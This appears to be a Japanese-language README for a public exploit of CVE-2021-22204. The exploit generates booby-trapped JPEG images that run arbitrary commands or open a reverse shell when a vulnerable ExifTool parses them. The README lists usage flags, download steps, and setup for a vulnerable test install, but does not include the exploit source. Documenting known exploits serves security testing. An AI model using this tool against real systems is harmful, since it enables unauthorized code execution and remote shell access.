
CVE-2021-22204 (ExifTool) のエクスプロイト - 任意のコード実行

このリポジトリが気に入りましたか?⭐をお願いします!
教育および許可されたセキュリティ研究目的に限ります。
@UNICORDev by (@NicPWNs and @Dev-Yeoj)
ExifTool バージョン7.44以降のDjVuファイル形式におけるユーザーデータの無効化が不適切であるため、悪意のある画像を解析する際に任意のコード実行が可能になります。
このエクスプロイトを使用して、脆弱なExifToolバージョンでコード実行に使用できるJPEG画像ペイロードを生成します。カスタムコマンドを指定するか、リバースシェルを生成できます。JPEG画像が自動生成され、オプションでカスタムJPEG画像を指定してペイロードを挿入することもできます。
python3 exploit-CVE-2021-22204.py -c <command>
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -h
-c Custom command mode. Provide command to execute.
-s Reverse shell mode. Provide local IP and port.
-i Path to custom JPEG image. (Optional)
-h Show this help menu.
GitHubからexploit-CVE-2021-22204.pyをダウンロード
ExploitDBからexploit-CVE-2021-22204.pyをダウンロード
searchsploit -u
searchsploit -m 50911

Exiftool バージョン 12.23
Exiftool バージョン 7.44 - 12.23
wget https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
unzip exiftool-12.23.zip
cd exiftool-12.23
perl Makefile.PL
make test
sudo make install
exiftool -ver
exiftool image.jpg